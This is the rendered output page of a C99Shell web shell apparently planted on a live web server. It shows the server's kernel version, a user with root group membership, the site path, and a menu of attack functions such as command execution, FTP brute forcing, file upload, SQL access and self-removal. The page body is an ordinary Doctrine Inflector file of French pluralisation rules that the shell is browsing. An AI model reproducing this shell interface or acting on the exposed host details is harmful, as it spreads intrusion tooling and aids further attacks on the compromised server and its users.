!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/gwp.picotech.app/public_html/vendor/doctrine/inflector/src/Rules/French/   drwxr-xr-x
Free 29.23 GB of 117.98 GB (24.78%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Inflectible.php (1.84 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

declare(strict_types=1);

namespace 
Doctrine\Inflector\Rules\French;

use 
Doctrine\Inflector\Rules\Pattern;
use 
Doctrine\Inflector\Rules\Substitution;
use 
Doctrine\Inflector\Rules\Transformation;
use 
Doctrine\Inflector\Rules\Word;

class 
Inflectible
{
    
/** @return Transformation[] */
    
public static function getSingular(): iterable
    
{
        yield new 
Transformation(new Pattern('/(b|cor|ém|gemm|soupir|trav|vant|vitr)aux$/'), '\1ail');
        yield new 
Transformation(new Pattern('/ails$/'), 'ail');
        yield new 
Transformation(new Pattern('/(journ|chev|loc)aux$/'), '\1al');
        yield new 
Transformation(new Pattern('/(bijou|caillou|chou|genou|hibou|joujou|pou|au|eu|eau)x$/'), '\1');
        yield new 
Transformation(new Pattern('/s$/'), '');
    }

    
/** @return Transformation[] */
    
public static function getPlural(): iterable
    
{
        yield new 
Transformation(new Pattern('/(s|x|z)$/'), '\1');
        yield new 
Transformation(new Pattern('/(b|cor|ém|gemm|soupir|trav|vant|vitr)ail$/'), '\1aux');
        yield new 
Transformation(new Pattern('/ail$/'), 'ails');
        yield new 
Transformation(new Pattern('/(chacal|carnaval|festival|récital)$/'), '\1s');
        yield new 
Transformation(new Pattern('/al$/'), 'aux');
        yield new 
Transformation(new Pattern('/(bleu|émeu|landau|pneu|sarrau)$/'), '\1s');
        yield new 
Transformation(new Pattern('/(bijou|caillou|chou|genou|hibou|joujou|lieu|pou|au|eu|eau)$/'), '\1x');
        yield new 
Transformation(new Pattern('/$/'), 's');
    }

    
/** @return Substitution[] */
    
public static function getIrregular(): iterable
    
{
        yield new 
Substitution(new Word('monsieur'), new Word('messieurs'));
        yield new 
Substitution(new Word('madame'), new Word('mesdames'));
        yield new 
Substitution(new Word('mademoiselle'), new Word('mesdemoiselles'));
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0044 ]--